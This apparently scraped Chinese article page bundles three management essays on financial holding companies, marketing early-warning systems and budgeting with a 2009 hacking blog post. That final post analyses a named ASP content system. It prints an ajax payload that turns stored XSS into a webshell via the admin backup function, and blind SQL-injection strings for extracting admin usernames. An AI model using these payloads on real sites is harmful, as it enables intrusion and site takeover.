试论中国金融控股公司的管理构造

2023-07-25 08:16:12| 收藏本文下载本文作者：张小碗

下面是小编给各位读者分享的试论中国金融控股公司的管理构造（共含4篇），欢迎大家分享。同时，但愿您也能像本文投稿人“张小碗”一样，积极向本站投稿分享好文章。

试论中国金融控股公司的管理构造

篇1：试论中国金融控股公司的管理构造

试论中国金融控股公司的管理构造

一、中国组建金融控股公司的现阶段首选――纯粹性的国有金融控股公司

中国金融控股公司现阶段的发展方向是纯粹性的金融控股公司，这是由我国目前的国有资产管理体系的构造及“分业经营、分业管理”的金融监管格局决定的。金融控股公司有两种类型：一类是纯粹控股公司(Pure Holding Company)；另一类是经营性控股公司(Operating Holding Company)。纯粹金融控股公司的母公司不从事业务活动，其全资拥有的`各个子公司（或控股）专门从事某些具体金融业务（如银行业务、证券业务、保险等）。经营性的金融控股公司的母公司除了从事一定范围的金融业务之外，不仅全资拥有（或控股）专门从事某些具体金融业务的各个子公司，而且还通过控股从事其他非金融业务，如工业、商业、贸易、建筑、运输、不动产等，在西方国家，金融控股公司一般都是指这类经营性控股公司，或称混合控股公司(Mixed Holding Company)，如英德两国的金融集团等。国有纯粹的金融控股公司接受政府授权，行使国有股的出资者职能，在一定的产业范围内，集聚核心竞争能力，发挥协同作用和耦合功能，通过资产经营和股权运作，再造原有业务，开拓全新业务，追求利润最大化，同时兼顾社会效益。纯粹的金融控股公司的成功运转，有利于政企分开，以规模经济和集聚经营提高国有资产营运效益，以增持或减持其所持有的股份促进国家产业结构调整。

纯粹的金融控股公司的优势具体表现为：(1)以少量股权控制庞大的金融资产，提高金融资产运转效率，特别是利用少量国有金融资产控制大量的非国有资产，提高国有金融资产乃至其他的非国有金融资产的运作效率；(2)进入和退出子公司十分方便，交易成本、运作成本低廉；(3)子公司是法人实体，拥有较大的独立性和积极性，对于纯粹金融控股公司的多元化、多角化混合经营很适合。

但是，由于纯粹型金融控股公司投资较分散，形成核心能力和经营理念难度较大，运作效率的提高受到一定程度影响，因此，纯粹型的金融控股公司在经营管理上存在着一定的难度。

从我国目前的国有资产管理体系的构造及“分业经营、分业管理”的金融监管格局来看，纯粹型金融控股公司仍是当前和将来一定时期内的唯一选择及理想选择。作为政府和国有企业之间的中介型金融企业法人，它不仅具有分开政企关系、让国有金融企业拥有自主生存与发展权利并承担市场风险，同时还可运用股东即出资者身份对所控股或参股的国有金融企业或其他企业进行监控，确保国有金融资产的安全等优点；而且在目前实行“分业经营、分业管理”的金融监管格局下其控制的银行、证券公司、保险公司等具有独立法人资格的子公司不仅能各司其职，而且还能防范金融风险，确保国家金融体系的稳定。

二、中国金融控股公司的管理构造

国外实例证明，金融控股公司内部管理体制是否科学合理，是决定其能否真正有效发挥积极作

[1] [2] [3] [4] [5]

篇2：构造营销管理的安全网

营销预警系统是指对各类营销计划进行控制的工具的总合，其过程是关于营销计划执行的控制过程，是营销管理的重要内容，它源于这样一个管理思想：即依靠完整的过程控制化解经营风险以求稳健经营比企业的超速发展更重要。在实务上，它可以表现为一套以计算机技术为工具的完整的预警系统，也可以是对有关营销管理的各种管控制度和措施的整合。

认识营销预警系统建立一套行之有效的营销预警系统，首先需要对营销预警有一个比较客观正确的认识。在过去的二十年，中国企业在国人的期待中，以快速成长为主要追求，然而，近几年来，许多企业都不得不吞下快速成长过程中管理滞后带来的苦果，其中营销管理滞后的影响更加直接。于是人们开始重视营销管理，其中营销预警系统更是倍受推崇。为了对营销预警的认识更加客观，我认为以下三个问题值得探讨。

1、营销预警管理的核心是什么

有人提出营销预警管理的核心是风险防范，通过防范风险将问题消灭在萌芽状态，从而规避风险，避免损失。我认为风险防范是营销预警不言而喻的目标，然而从技术上讲，它不是操作层面上的概念。所谓核心是问题的出发点和关键点，从这个意义上讲，控制偏差才是营销预警管理的核心。

这看起来是个措辞问题，其实不是，事实上它涉及到对营销预警的理解。“风险防范说”（姑且这么叫吧）主要强调营销作业运作过程中出现的问题，这时候问题往往已经发生，甚至风险已经存在，只是还没有累积到引起高层管理人员注意的程度。而我说偏差控制，不仅包括作业过程中出现的偏差，事实上，既使不打任何折扣地按照营销计划和营销管理规则进行营销作业，仍然可能发生重大问题，酿成重大风险，

为什么？原因有二：一是营销计划和营销预警参照系统本身就可能存在这样那样的偏差，二是企业内外的营销环境总是在不断地变化，也可能导致营销计划和营销预警参照系统的局部不适应。因此，我把营销预警管理的核心定义为偏差控制，它包括三个内容：一是对营销计划执行过程中可能出现的操作性偏差进行提示、限制和矫正；二是对营销计划和营销预警参照系统的设计缺陷进行提示、反馈和修改；三是对营销计划和营销预警参照系统所依存的环境的变化进行提示，从而调适、甚至是重新定义营销计划和营销预警参照系统。

2、营销预警是事前控制、事中控制还是反馈控制

有些人认为营销预警能提前预测出市场作业过程中的风险并能加以防范。而实际上营销预警和营销管理一起构成营销控制的重要内容，如果按控制信息获取的方式和时点的不同划分，营销管理能够通过一系列的制度和措施，将可能产生的偏差消除在发生之前，即预测风险并加以防范，从而实现事前控制；而营销预警更多地则是针对营销作业过程中已经出现的偏差采取措施以确保任务的完成，以及对作业结果进行测量、比较和分析，从而发现偏差以避免重复或偏差的扩大和积累。因此说，营销预警系统是一个实践性纠偏系统，它的事中控制和反馈控制的功能应该远远强于它的事前控制功能。

3、营销预警管控的对象是什么

关于营销预警管控的对象有人提出是对企业某些营销人员在市场营销运营有违公司管理原则、销售政策有损企业利益的具体行为和潜在的影响企业正常行销规范的人和事。我认为这样定义营销预警管控的对象可能会导致在处理营销问题的过程让营销人员承担过多的责任或者不合理的责任，这种思想过于强调人的作用和对人的管控，它必须存在于这样一个假设的基础之上：企业的所有制度都是正确的，人只应当无条件地按章办事。我承认人是营销活动中最积极的因素，但同样应该承认的是，营销环境是决定营销活动的决定性因素，相应地，营销计划随着营销环境的变化也具有动态的特性，当营销人员和营销计划发生冲突时，我们不能简单认为是人违反了公司的管理原则、销售政策。因此，人员、计划和环境都是营销预警系统管控的对象。

篇3：控股公司实施全面预算管理的必要性管理论文

控股公司实施全面预算管理的必要性管理论文

摘要:在企业管理方式的选择中,全面预算管理以其在企业经营中的独到功能和作用,越来越引起人们的重视。文章介绍了全面预算管理和相对控股的涵义,分析了相对控股公司实施全面预算管理的必要性,最后具体分析了全面预算管理在相对控股企业的实现方式。

关键词:全面预算管理;相对控股公司;应用

全面预算管理是目前很多企业普遍采用的主要管理方式。在企业管理方式的选择中,全面预算管理以其在企业经营中的独到功能和作用,越来越引起人们的重视。全面预算管理的应用没有全资、控股与相对控股的差别。文章就全面预算管理在相对控股公司中的应用进行探讨。

一、全面预算管理和相对控股的涵义

全面预算是指所有以货币及其他数量形式反映的有关企业未来一段时间内全部经营活动各项目标的行动计划与相应措施的数量说明。全面预算在企业管理中所占的重要地位是由其功能和作用决定的,具体包括:用来规划企业在某个计划期间的经济活动及其成果;财务部门实施经济业务监控的依据;评定考核各公司、部门工作实绩的标准;利于各公司、部门确定工作目标、方向;利于集团总体目标的实现。

相对控股模式是最近我国出现的一种新的股权结构模式。相对控股是指股东出资额或者持有股份的比例虽然不足百分之五十,但依其出资额或者持有的股份所享有的表决权已足以对股东会、股东大会的决议产生重大影响,如果股权比较分散,一般要达到30%以上。总体而言,相对控股模式更有利于发挥公司治理作用,从而能够更为有效地促使经理人员按股东利益最大化原则行事,并实现公司价值最大化。

二、相对控股公司实施全面预算管理的必要性

全面预算管理是现代企业管理的核心内容之一,也是被各类企业包括相对控股企业证明是行之有效的管理方法。微观上,它有助于相对控股企业管理水平和效益的提高;宏观上,它是利用市场机制优化社会资源配置的重要手段。预算管理及预算机制已经深入到社会经济生活的各个层面,也是相对控股企业管理的需要。

(一)是从利润管理到价值管理的需要

从理论上将企业财务目标界定为股东价值最大化或企业价值最大化似乎已无可争议。利润最大化的评价指标主要有利润绝对指标和利润相对指标。这些指标不能客观地反映企业价值的实现,其主要缺陷表现在于:利润指标容易被人为操纵,忽略了货币时间价值,没有考虑未来实现利润的'风险,不能反映利益相关者的目标。价值最大化目标的评价指标主要有EVA指标和现金流量贴现评估指标。EVA指标是经过调整的营业净利润减去现有资产经济价值的机会成本后的余额。现金流量评估指标是通过对企业未来自由现金流量以资金成本估计值折现计算出的现值。这些指标充分反映了股东价值实现的情况。

(二)是产权制度变革新形势下的必然选择

随着我国经济体制改革的不断深入,企业的产权结构发生了变化,出现了分散的多元化的投资群体,企业也出现了所有权与经营权的两权分离。相对控股企业也是如此,企业投资者关注的是企业的经营成果,更是未来的发展前景,是当前实现的利润更是未来的盈利能力和发展能力,是利润的总额更是利润的质量。因此为了适应投资者的需要,经营者对企业的控制和规划,从经营结果(利润预算)扩大到经营过程(业务预算和资金预算)并进而扩展到经营质量(资产负债预算和现金流量预算),所以推行全面预算管理是相对控股企业投资者和经营者在产权制度变革新形势下的必然选择。

(三)是相对控股企业从日常财务发展到战略财务的需要

我国目前大部分相对控股企业财务工作重点是记帐、算帐、报帐、财务计划分解平衡、财务收支审核,以及财务指标分析。我国企业财务职能滞后的主要原因是:财务在企业中的地位低,财务模式落后以及财务人员知识陈旧等。从日常财务发展到战略财务势在必行。战略财务的实施应从三个方面入手:一是在董事会中建立财务委员会和审计委员会,并向企业委派财务总监,从组织上保证财务参与决策的地位。二是构件财务规划体系。三是要求企业财务人员具备相当的专业知识。

三、全面预算管理在相对控股企业的实现方式

相对控股企业要顺利实现经营目标,就要对企业实行全面的预算管理,在预算管理中要重点注意以下几个方面。

(一)全面预算管理的组织设置

由于全面预算管理模式是对企业的决策目标及资源配置加以量化,并使企业的整个经营活动进行协调运转的控制系统,因而,在相对控股公司中,必须设立一个权威性和独立性较强的预算管理委员会作为预算管理的最高权威机约束语构。其主要部门及其职能设置如下: 预算管理委员会的主任一般由相对控股公司总经理担任,负责预算管理的重要事项,以保证预算管理的权威性。预算管理委员会下设置办公室,由相对控股公司财务部负责人为主任,以财务部为主导,负责预算管理的日常工作。预算管理委员会分别吸收营销、生产、采购、技术、信息、质检、内审、人事部门的最高负责人担任委员。在预算委员会之下,设立价格委员会、业绩考评委员会和内部审计委员会。

(二)全面预算体系的编制

相对控股公司全面预算的编制与总公司预算的编制不一样,有着其自身

的特点。全面预算体系包括资本预算、经营预算和财务预算三大部分,这三部分相辅相成,缺一不可。在相对控股公司的全面预算管理中,预算编制应采取“服从上级,结合自身”的步骤,充分体现出分权与集权的统一。

具体步骤是:(1)认真学习集团总部提出的预算思想与目标。(2)把集团同步给相对控股公司下发的预算目标下发给各部门、二级单位,并结合自身情况另编制预算草案。(3)由预算管理委员会进行初步协调和汇总。(4)对通过的预算方案以内部法规的形式下达到各部门、二级单位执行。

(三)全面预算管理的执行与调控

在相对控股企业中,预算编制再好,如果执行不力,也只是纸上谈兵,因此,在做好基础工作后,必须严格执行预算通过责任细化对预算执行过程中的凭证传递和手续审批进行控制,以保证预算执行的有效性。财务部门作为最后的把关控制点,对一般业务,在进行服务处理时,首先看是否有预算,如果没有顶算,则拒绝。

当然,在预算执行过程中不可避免地会产生需要进行调整的情况。调整的原则是对个别预算项目进行微调并实施监控,使调整在不影响预算总体目标下适应当前情况。在预算的执行过程中,各部门要不断对责任范围内的人、财、物在时空范困内组织协调,以适应生产经营过程中不断出现的变化,并将影响预算日标变化的原因和可能的后果逐级报至预算管理委员会。预算的执行和调控要形成一个监控网络,高度关注控制项目,使预算执行中的问题能够得到及时处理。

(四)全面预算执行情况分析与考核

在相对控股公司中,预算管理委员会及各业务归口管理部门应对预算的执行情况按季度进行分析,着重分析利润预算、资本性支出预算、现金流量预算的完成情况,对当期实际发生数与预算数之间存在的差异,不论是有利还是不利,都要认真分析其成因,而且要写明拟采取的改进措施。

预算管理委员会

及各业务归门管理部门负责对预算执行情况进行考核,考核的内容包括预算完成情况、预算编制准确性与及时性等指标。考核采取记分制,基础分为100分。预算的实际完成数每超过或低于预算数一定百分比则给予一定的处罚或奖励。

推行全面预算管理是国外成功企业普遍采用的一种现代管理机制。我国已有三分之一的大中型企业开始实行全面预算管理,全面预算管理是实现公司治理和公司资源整合的最基本、最有效的手段,我们同样要在相对控股企业中大力推行这种现代的管理方法,将预算作为一种管理意识,内置于公司所有行为和活动之中,加强内部控制和科学管理,提高经济运行质量,实现相对控股企业的最佳经济效益。

篇4：利用or构造SQL巧妙注射分析睿智管理系统安全漏洞预警

题目：利用or构造SQL巧妙注射-分析睿智管理系统安全

作者：By L4nk0r[l4nkor.org]

来源：L4nk0r'S Blog

此文章已发表在《手册》2009年第10期杂志上，后经作者发布在博客上，如转载请务必保留此信息!

L4nk0r:为方便大家阅读，最后提供文件打包下载

前言:

最近上cnzz下载了一套网站管理系统,在源码首页发现它,心想cnzz都推荐应该安全性相当不错了.官方下载最新版本本地搭建IIS测试发现简洁易用,整体上安全做得不错.由于是免费版的,可能官方有点放水.不过这里不影响我们的分析,这里讨论两个方面:跨站的利用,SQL注射.还是一句话:重在思路.

一.隐藏的数据库

分析代码经常要用到数据库(我分析的是Access版本的) ,习惯性的打开数据库,惊奇的发现只有一个notdown表,如图01:

可是再仔细查看代码发现不应该只有这张表的,于是就想是不是隐藏起来了?第一次看到这种情况,于是就查看了下Access帮助说明,在其中发现原来有还存在两种属性的数据表,即系统对象和隐藏对象.下面做一个小知识补充:

由于Access默认是不显示系统对象和隐藏对象的.所以如果一个表中存在隐藏对象或者系统对象那么就无法看到该表了. 简单说下隐藏方法,设计好表后右击表选择“属性”->“隐藏”属性打勾,刷新下就看不到了,这样就是隐藏对象了,默认是看不到的.至于系统对象,我们可以修改表的前缀为 usys,这样就可以把表改成一个系统对象.这两种方法都可以.

既然可以隐藏当然也可以恢复显示了, 按如下操作:“工具”菜单->“选项”命令->“视图”选项卡->选中“显示”一栏下的“系统对象”复选框或者“隐藏对象”复选框，并按下“确定”按钮，就可以重新显示所有表了.如图02

Ok了,数据就可以和正常的一样了.

二.跨站的深入利用鸡肋

首先看看漏洞文件/include/PlS.asp,查看代码发现是一个评论显示,在多个文件被包含了,代码如下:

IF LePl“” then

Dim Author,Content,mycode

Author=Trim(Request.Form(“Author”))// 简单的过滤空格

Content=Trim(Request.Form(“Content”)) //同上

mycode = trim(request.form(“code”))

if Author=“” or Content=“” then

Call Alert (“请填写完整再提交”,“-1”)

end if

if mycodeSession(“getcode”) then

Call Alert (“您输入验证码错误”,“-1”)

end if

set rs = server.CreateObject (“adodb.recordset”)

sql=“select * from zhi_rui_E_Pl”

rs.open sql,conn,1,3

rs.addnew

rs(“cli”)=Request.Form(“cli”)

rs(“Ioid”)=request.Form(“Inid”)

rs(“Author”)=Author

rs(“Content”)=Content

------------------------省略部分代码-------------------------------

显然没有任何过滤,直接写入数据库,跨站产生了.由于数据库是mdb格式的,所有插马也没用.这里就想到了是否可以备份数据库?进入后台看到数据库备份,查看如图03:

看到了没,据库路径和备份文件名都不能修改,有些朋友可能就到这里停止,其实不然,还可以继续,经验告诉我,他是将该输入框写成hidden隐藏域了,查看文件/admin/Admin_Data.asp代码如下:

<%=DataName%>“ size=”40“ />

看到这行type=hidden,猜测没错.那也就是说同样可以备份任意文件了.所有后台拿shell比较简单了.(插马备份数据库比较麻烦,要绕过<%loop<%,在上期我给大家讲过绕过<%loop<%的方法)那至于跨站如何利用?没错,配合ajax提交给后台管理查看评论就会自动备份数据库了,但是这里数据库有防下载表导致利用起来有麻烦,另外普通用户没有办法上传任何文件,不然可以通过上传一个图片格式的木马,然后通过跨站利用ajax自动备份文件.这个跨站在ACCess中无法利用,在MSSQL版本中就可以思考了.作为技术讨论,我还是给出ajax代码,假设我可以上传一个图片格式的木马upload/2009082150598817.jpg,现在我通过跨站备份这个文件成asp文件,经过分析写出代码如下(保存下面代码为l4nk0r.js上传到你网站):

// 判断浏览器类型并定义创建xmlhttp会话

if (window.XMLHttpRequest)

{

xmlhttp = new XMLHttpRequest();

} else if (window.ActiveXObject)

{

try

{

xmlhttp = new ActiveXObject(”Msxml2.XMLHTTP“);

}

catch (e)

{

try

{

xmlhttp = new ActiveXObject(”Microsoft.XMLHTTP“);

}

catch (e)

{

}

function backup()

{

var postStr = ”DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp“;

xmlhttp.open(”POST“,”/admin/Admin_data.asp?action=RestoreData&act=Restore“,true);

xmlhttp.setRequestHeader(”Content-Type“,”application/x-www-form-urlencoded“);

xmlhttp.send(postStr);

}

Backup();

然后在你要提交的地方提交这样当管理员查看这条评论就会触发了.不过这个漏洞在这个系统中是鸡肋,只是借这个机会和大家分享这个思路.下面进入主角讨论

三.利用or构造SQL继续注射

漏洞文件:admin/admin_cklogin.asp,后台登录验证文件,发现注入漏洞,代码如下:

LoginName=trim(request.form(”LoginName“))

LoginPassword=Md5(request.form(”LoginPassword“))

mycode = trim(request.form(”code“))

set rs = server.createobject(”adodb.recordset“)

‘ 很明显的注入漏洞,变量loginname没有经过过滤直接执行sql语句

‘注意loginname是用2个单引号括起来的.要注意前后闭合问题.

sql=”select * from zhi_rui_E_manage where AdminName='“&LoginName&”'“

rs.open sql,conn,1,3

if rs.eof then

response.write ”“

response.end

end if

好了,注入原理就不废话直接进入利用.查看数据库管理员表中默认只有一个管理员,而且这个管理员用户名可以修改.如果默认管理员没有修改可以利用and语句来注入,这种注入语句也比较简单,这里不讨论.考虑到通用性如果修改了?前台没有一个地方可以找个管理员用户名的痕迹.好了…那么我们就谈谈如何利用or来注入(非万能密码,是不行的.).

先说下注入结果有3种:

1. 提示”管理员名称不正确，请重新输入”,说明注入语句没正确构造或者正确构造了但sql不成立;

2. 提示” 管理员密码不正确，请重新输入”,说明注入语句成立;

3. 直接跳到Admin_Cklogin.asp显示空白页面,表示你的密码也正确了.这种情况基本不可能,不然也不用这么费劲了.

分析下这sql语句

sql=”select * from zhi_rui_E_manage where AdminName='“&LoginName&”'“

变量名通过2个单引号包含,必须注意闭合,只要SQL成立就会正确注入,那么我们利用or注入就会想了如何才能同时满足这些条件?没错,让前面的为假,or后为真即我们的注入语句,最后一个or是一个闭合符号且为假,总体逻辑为

假 or 真 or 假 ->结果为真,提示密码错误

假 or 假 or 假 ->结果为假,提示用户名错误

ok原理思路明白了,可以构造出如下SQL语句.

(1) 1' or (select count(*) from zhi_rui_E_manage)>2 or '1'='2 (判断管理员是否大于2个)

(2) 1' or (select asc(mid(adminname,1,1)) from zhi_rui_E_manage where id=1)>96 or '1'='2(判断id=1的用户名的首个字母的ASCII码是否为a,依次换位判断就可以得到管理员用户名)